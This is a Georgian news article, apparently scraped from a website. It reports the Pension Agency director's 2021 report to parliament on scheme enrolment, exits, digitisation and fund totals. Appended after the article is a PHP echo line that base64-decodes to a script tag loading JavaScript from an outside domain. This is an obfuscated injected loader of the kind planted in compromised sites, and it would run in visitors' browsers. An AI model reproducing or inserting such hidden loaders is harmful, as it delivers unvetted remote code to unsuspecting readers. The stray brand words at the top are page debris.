celsiusi
ავერსი საქკაბელი
დაგროვებით საპენსიო სისტემას 2021 წლის განმავლობაში 1 880 დასაქმებული გაეთიშა. აღნიშნულ პერიოდში, საპენსიო სქემიდან გასული დასაქმებულებიდან სქემაში ხელახლა გაწევრიანდა 302 დასაქმებული, – ამის შესახებ პარლამენტის პლენარულ სხდომაზე საპენსიო სააგენტოს დირექტორმა განაცხადა.
 
გიორგი დანელიამ დეპუტატებს საპენსიო სააგენტოს 2021 ანგარიში გააცნო.
 
„2021 წლის განმავლობაში საპენსიო შენატანების ადმინისტრირების ელექტრონულ სისტემაში დარეგისტრირდა 11 194 დამსაქმებელი და გაწევრიანებული იქნა 129 376 დასაქმებული. შედეგად, 2021 წლის 31 დეკემბრის მდგომარეობით, საპენსიო სქემაში გაწევრიანებულ დასაქმებულთა რაოდენობამ ჯამში შეადგინა მილიონ 235 938 ადამიანი, რაც, წინა წელთან შედარებით, 11,5 პროცენტით მეტია. ამავე პერიოდში სააგენტოს სისტემაში რეგისტრირებული დამსაქმებლების რაოდენობა 82 795-ია. საპენსიო დეკლარაციების საფუძველზე, 2021 წლის 31 დეკემბრის ჩათვლით საპენსიო ფონდში შეტანილი თანხის საერთო ოდენობამ შეადგინა მილიარდ 782 მილიონ ლარზე მეტი, ხოლო ფონდიდან გამოტანილი იქნა 66 მილიონ 483 394 ლარი საპენსიო სქემიდან გასვლის არასწორად გაწევრიანებული დასაქმებულის მიერ საპენსიო სქემის დატოვების, პენსიის დანიშვნის, ან საპენსიო აქტივების გაცემისა და მაკორექტირებელი დეკლარაციების საფუძველზე“, – აღნიშნა გიორგი დანელიამ.
 
მისი თქმით, 2021 წელს დაიწყო საპენსიო სააგენტოს სერვისების გაციფრულება.
 
​„სხვადასხვა ღონისძიებები გატარდა ამ მიმართულებით. კერძოდ, ელექტრონულ სისტემაში დასაქმებულებს, თვითდასაქმებულებს შეეძლოთ, გარკვეული ოპერაციების ავტომატურ რეჟიმში გაკეთება. მაგალითად, საბალანსო თანხების დაბრუნება, შეცდომით გაწევრიანებული დასაქმებულების სქემიდან ამორთვა და ა.შ. ასევე, ამ პერიოდში დაიწყო დასაქმებულის მიერ კანონით გათვალისწინებული ვალდებულებების შესრულების მონიტორინგი, მაკორექტირებელი დეკლარაციების შერჩევითი კონტროლი, ცალკეული კრიტერიუმების გათვალისწინებით. 2021 წლის 20 აპრილიდან კონტროლის პროცესი გაიარა 1 239-მა ასეთმა დეკლარაციამ, ჯამური დასაკორექტირებელი თანხით 472 000 ლარზე მეტი. მათგან 419 მაკორექტირებელი დეკლარაცია იქნა უარყოფილი“, – აღნიშნა გიორგი დანელიამ.
 
მისი თქმით, საანგარიშო პერიოდში სააგენტოს გახსნილი ჰქონდა ნომინალური მფლობელობის ანგარიშები საქართველოს ათ კომერციულ ბანკში, რომელთა მეშვეობით სააგენტო ახდენდა საპენსიო შენატანების შეგროვებას. ასევე, სააგენტოს გახსნილი ჰქონდა ანგარიში საქართველოს ეროვნულ ბანკში.
 
„რაც შეეხება სქემიდან გასვლის პროცესს, დასაქმებული, რომელსაც 2018 წლის 6 აგვისტომდე შეუსრულდა 40 წელი და რომელსაც არ სურს, ან არ სურდა, იყოს საპენსიო სქემის მონაწილე, უფლებამოსილია, კანონის 22-ე მუხლის შესაბამისად გავიდეს საპენსიო სქემიდან, სააგენტოს მიერ განსაზღვრული წესის შესაბამისად. გამომდინარე იქიდან, რომ სააგენტოს არ გააჩნია ტერიტორიული ერთეულები საქართველოს რეგიონებში, ამ პროცესში სააგენტოს ეხმარება სოციალური მომსახურების სააგენტო და მისი 69 ტერიტორიული ერთეული. 2021 წლის განმავლობაში 1 880-მა დასაქმებულმა ისარგებლა საპენსიო სქემიდან გასვლის უფლებით. საპენსიო სქემიდან გასული დასაქმებულებიდან აღნიშნულ პერიოდში სქემაში ხელახლა გაწევრიანდა 302 დასაქმებული. წინა წელთან შედარებით, დაახლოებით 42 პროცენტით ნაკლებია სქემიდან გასულ მონაწილეთა რაოდენობა. 2019 წლიდან 2021 წლის ჩათვლით, დაგროვებითი საპენსიო სქემიდან გასულ დასაქმებულთათვის საპენსიო ფონდიდან გამოტანილმა აქტივებმა ჯამურად შეადგინა 58 მილიონ ლარზე მეტი“, – განაცხადა გიორგი დანელიამ.
323
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");